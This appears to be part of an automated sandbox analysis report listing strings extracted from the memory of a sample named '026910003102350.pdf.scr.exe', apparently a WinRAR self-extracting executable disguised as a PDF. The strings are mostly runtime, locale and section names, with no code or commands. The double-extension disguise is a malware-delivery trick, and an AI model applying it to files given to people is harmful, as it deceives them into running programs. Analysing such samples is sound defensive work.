iterator'`eh vector copy constructor iterator'`eh vector vbase copy constructor iterator'`dynamic initializer for '`dynamic atexit destructor for '`vector copy constructor iterator'`vector vbase copy constructor iterator'`managed vector copy constructor iterator'`local static thread guard'operator "" operator co_awaitoperator<=> type descriptor' base class descriptor at ( base class array' class hierarchy descriptor' complete object locator'`anonymous namespace'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: <pi-ms-win-core-fibers-l1-1-1<pi-ms-win-core-synch-l1-2-0api-ms-
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: flsalloc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: flsfree
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: flsgetvalue
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: flssetvalue
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: initializecriticalsectionex
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ( 8px
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 50p( 8px
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 700wp
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `h````
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: xpxxxx
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `h````xpxxxx
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: (null)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: (null)(null)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: corexitprocess
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mscoree.dllcorexitprocess`
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: nan(snan)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: nan(snan)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: nan(ind)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: nan(ind)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: e+000
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: sunday
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: monday
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: tuesday
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: wednesday
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: thursday
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: friday
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: saturday
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: january
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: february
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: march
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: april
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: august
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: september
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: october
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: november
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: december
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mm/dd/yy
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: dddd, mmmm dd, yyyy
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: hh:mm:ss
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: infinfnannannan(snan)nan(snan)nan(ind)nan(ind)e+000sunmontuewedthufrisatsundaymondaytuesdaywednesdaythursdayfridaysaturdayjanfebmaraprmayjunjulaugsepoctnovdecjanuaryfebruarymarchapriljunejulyaugustseptemberoctobernovemberdecemberampmmm/dd/yydddd, mmmm dd, yyyyhh:mm:sssunmontuewedthufrisatsundaymondaytuesdaywednesdaythursdayfridaysaturdayjanfebmaraprmayjunjulaugsepoctnovdecjanuaryfebruarymarchapriljunejulyaugustseptemberoctobernovemberdecemberampmmm/dd/yydddd, mmmm dd, yyyyhh:mm:ssen-us g
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ((((( h
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: (
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: api-ms-win-appmodel-runtime-l1-1-1<pi-ms-win-core-datetime-l1-1-1<pi-ms-win-core-fibers-l1-1-1<pi-ms-win-core-file-l2-1-1<pi-ms-win-core-localization-l1-2-1<pi-ms-win-core-localization-obsolete-l1-2-0<pi-ms-win-core-processthreads-l1-1-2<pi-ms-win-core-string-l1-1-0<pi-ms-win-core-synch-l1-2-0<pi-ms-win-core-sysinfo-l1-2-1<pi-ms-win-core-winrt-l1-1-0<pi-ms-win-core-xstate-l2-1-0api-ms-win-rtcore-ntuser-window-l1-1-0api-ms-win-security-systemfunctions-l1-1-0ext-ms-win-kernel32-package-current-l1-1-0ext-ms-win-ntuser-dialogbox-l1-1-0ext-ms-win-ntuser-windowstation-l1-1-0advapi32kernel32user32
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getcurrentpackageid
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: lcmapstringex
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: localenametolcid
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ja-jpzh-cnko-krzh-twuk
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: k#cd8l2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: [aoni*{
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: elk(w
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ~ $s%r
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: @b;zo]
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: iu+-,
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: obwq4
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: v2!l.2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ^<v7w
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 1#inf
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 1#qnan
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 1#snan
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 1#ind
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ;01#inf1#qnan1#snan1#ind
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: arbgcazh-chscsdadeelenesfifrhehuisitjakonlnoplptroruhrsksqsvthtruridbesletlvltfavihyazeumkafkafohimskkkyswuzttpagutateknmrsamnglkoksyrdivar-sabg-bgca-escs-czda-dkde-deel-grfi-fifr-frhe-ilhu-huis-isit-itnl-nlnb-nopl-plpt-brro-roru-ruhr-hrsk-sksq-alsv-seth-thtr-trur-pkid-iduk-uabe-bysl-siet-eelv-lvlt-ltfa-irvi-vnhy-amaz-az-latneu-esmk-mktn-zaxh-zazu-zaaf-zaka-gefo-fohi-inmt-mtse-noms-mykk-kzky-kgsw-keuz-uz-latntt-rubn-inpa-ingu-inta-inte-inkn-inml-inmr-insa-inmn-mncy-gbgl-eskok-insyr-sydiv-mvquz-bons-zami-nzar-iqde-chen-gbes-mxfr-beit-chnl-benn-nopt-ptsr-sp-latnsv-fiaz-az-cyrlse-sems-bnuz-uz-cyrlquz-ecar-egzh-hkde-aten-aues-esfr-casr-sp-cyrlse-fiquz-pear-lyzh-sgde-luen-caes-gtfr-chhr-basmj-noar-dzzh-mode-lien-nzes-crfr-lubs-ba-latnsmj-sear-maen-iees-pafr-mcsr-ba-latnsma-noar-tnen-zaes-dosr-ba-cyrlsma-sear-omen-jmes-vesms-fiar-yeen-cbes-cosmn-fiar-syen-bzes-pear-joen-ttes-arar-lben-zwes-ecar-kwen-phes-clar-aees-uyar-bhes-pyar-qaes-boes-sves-hnes-nies-przh-chtsrx
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: paf-zaar-aear-bhar-dzar-egar-iqar-joar-kwar-lbar-lyar-maar-omar-qaar-saar-syar-tnar-yeaz-az-cyrlaz-az-latnbe-bybg-bgbn-inbs-ba-latnca-escs-czcy-gbda-dkde-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ares-boes-cles-coes-cres-does-eces-eses-gtes-hnes-mxes-nies-paes-pees-pres-pyes-sves-uyes-veet-eeeu-esfa-irfi-fifo-fofr-befr-cafr-chfr-frfr-lufr-mcgl-esgu-inhe-ilhi-inhr-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inkok-inko-krky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-bnms-mymt-mtnb-nonl-benl-nlnn-nons-zapa-inpl-plpt-brpt-ptquz-boquz-ecquz-pero-roru-rusa-inse-fise-nose-sesk-sksl-sisma-nosma-sesmj-nosmj-sesmn-fisms-fisq-alsr-ba-cyrlsr-ba-latnsr-sp-cyrlsr-sp-latnsv-fisv-sesw-kesyr-syta-inte-inth-thtn-zatr-trtt-ruuk-uaur-pkuz-uz-cyrluz-uz-latnvi-vnxh-zazh-chszh-chtzh-cnzh-hkzh-mozh-sgzh-twzu-za
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: log10
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 0log10
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ?0c0c
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loglog10exppowasinacossqrt
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 9=@$"
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ?5wg4p
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bc .=
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bc .=0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: <(lx
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: #{ =`~r=
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: %s#[k
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: "b <1=
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: #.x'=
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: #.x'=hbo
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ?tanh
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: atan2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: floor
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ldexp
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: _cabs
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: _hypot
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: frexp
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: _logb
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: _nextafter
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ?tanhatanatan2sincostanceilfloorfabsmodfldexp_cabs_hypotfmodfrexp_y0_y1_yn_logb_nextafter
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: sinhcosh
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: conout$
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `rsds
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: d:\projects\winrar\sfx\build\sfxrar32\release\sfxrar.pdb
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .text$di
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .text$mn
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .text$x
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .text$xp+
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .text$yd
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: l.text$yd0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$5
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$5x2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .00cfg
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xca
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xcaa
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xcu
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ,.crt$xcu
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xcz
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xia
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xiaa
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xiac
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xic
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xiz
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xpa
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xpx
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xpxa
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xpz
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xta
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xtz
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .gfids
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rdata
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: {.rdata
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rdata$r
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rdata$sxdata
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rdata$voltmd
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: d.rdata$voltmd
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rdata$zzzdbg
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rtc$iaa
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rtc$izz
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rtc$taa
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rtc$tzz
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .xdata$x
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$3
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$3
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$4
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$6
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$7
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$7p
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .edata
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 4.edata
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: <.idata$2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$3
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$4
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$4l
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$6
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .data
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .data
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .data$r
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .data$rs
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .bss0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$5
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$5@
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rsrc$01
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rsrc$01pf
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rsrc$02
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rsrc$02"
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: showwindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: showwindow'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdlgitem
